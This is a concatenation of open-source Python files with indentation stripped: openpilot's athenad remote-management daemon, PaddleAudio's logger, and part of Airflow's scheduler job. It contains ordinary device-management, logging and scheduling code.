cloudlog.warning(f"athena.upload_handler.retry {e} {cur_upload_items[tid]}")
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
item = item._replace(
retry_count=item.retry_count + 1,
progress=0,
current=False
)
upload_queue.put_nowait(item)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_origin(),
"branch": get_short_branch(),
"commit": get_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0):
destination = {
"latitude": latitude,
"longitude": longitude,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
params.delete("PrimeRedirected")
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
except socket.timeout:
try:
r = requests.get("http://api.commadotai.com/v1/me", allow_redirects=False,
headers={"User-Agent": f"openpilot-{get_version()}"}, timeout=15.0)
if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
params.put_bool("PrimeRedirected", True)
except Exception:
cloudlog.exception("athenad.socket_timeout.exception")
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
log.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import functools
import logging
import os
import sys
import threading
import time
from typing import List
import colorlog
from colorama import Fore
loggers = {}
log_config = {
'DEBUG': {
'level': 10,
'color': 'purple'
},
'INFO': {
'level': 20,
'color': 'green'
},
'TRAIN': {
'level': 21,
'color': 'cyan'
},
'EVAL': {
'level': 22,
'color': 'blue'
},
'WARNING': {
'level': 30,
'color': 'yellow'
},
'ERROR': {
'level': 40,
'color': 'red'
},
'CRITICAL': {
'level': 50,
'color': 'bold_red'
}
}
class Logger(object):
'''
Deafult logger in PaddleAudio
Args:
name(str) : Logger name, default is 'PaddleAudio'
'''
def __init__(self, name: str = None):
name = 'PaddleAudio' if not name else name
self.logger = logging.getLogger(name)
for key, conf in log_config.items():
logging.addLevelName(conf['level'], key)
self.__dict__[key] = functools.partial(self.__call__, conf['level'])
self.__dict__[key.lower()] = functools.partial(self.__call__, conf['level'])
self.format = colorlog.ColoredFormatter('%(log_color)s[%(asctime)-15s] [%(levelname)8s]%(reset)s - %(message)s',
log_colors={key: conf['color']
for key, conf in log_config.items()})
self.handler = logging.StreamHandler()
self.handler.setFormatter(self.format)
self.logger.addHandler(self.handler)
self.logLevel = 'DEBUG'
self.logger.setLevel(logging.DEBUG)
self.logger.propagate = False
self._is_enable = True
def disable(self):
self._is_enable = False
def enable(self):
self._is_enable = True
@property
def is_enable(self) -> bool:
return self._is_enable
def __call__(self, log_level: str, msg: str):
if not self.is_enable:
return
self.logger.log(log_level, msg)
@contextlib.contextmanager
def use_terminator(self, terminator: str):
old_terminator = self.handler.terminator
self.handler.terminator = terminator
yield
self.handler.terminator = old_terminator
@contextlib.contextmanager
def processing(self, msg: str, interval: float = 0.1):
'''
Continuously print a progress bar with rotating special effects.
Args:
msg(str): Message to be printed.
interval(float): Rotation interval. Default to 0.1.
'''
end = False
def _printer():
index = 0
flags = ['\\', '|', '/', '-']
while not end:
flag = flags[index % len(flags)]
with self.use_terminator('\r'):
self.info('{}: {}'.format(msg, flag))
time.sleep(interval)
index += 1
t = threading.Thread(target=_printer)
t.start()
yield
end = True
logger = Logger()
|
scheduler_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout
from datetime import timedelta
from typing import List, Set
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.local_executor import LocalExecutor
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagRun, SlaMiss, errors
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.stats import Stats
from airflow.ti_deps.dep_context import SCHEDULED_DEPS, DepContext
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, SimpleDag, SimpleDagBag,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.session import provide_session
from airflow.utils.state import State
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: List[str]
:param zombies: zombie task instances to kill
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
# The process that was launched to process the given .
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param zombies: zombie task instances to kill
:type zombies: list[airflow.models.taskinstance.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)),\
redirect_stderr(StreamLogWriter(log, logging.WARN)):
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_id_white_list, log=log)
result = dag_file_processor.process_file(
file_path=file_path,
zombies=zombies,
pickle_dags=pickle_dags
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
def __init__(self, dag_ids, log):
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
)
)
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = 0
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if active_dag_runs >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
active_dag_runs += 1
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs (if CHECK_SLAS config enabled).
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: List[airflow.models.DAG]
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
check_slas = conf.getboolean('core', 'CHECK_SLAS', fallback=True)
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
